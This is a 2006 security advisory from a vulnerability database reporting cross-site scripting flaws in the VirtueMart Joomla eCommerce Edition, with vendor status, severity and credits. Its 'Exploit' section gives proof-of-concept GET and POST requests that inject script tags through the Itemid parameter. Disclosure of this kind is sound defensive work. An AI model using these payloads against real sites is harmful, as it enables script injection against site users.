Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14468
HistorySep 28, 2006 - 12:00 a.m.

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

2006-09-2800:00:00
vulners.com
55
JSON

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low

Software Description:

VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:

Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:

Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:

GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>

Solution:

None at this time.

Credits:

Discovered by Adrian Castro

JSON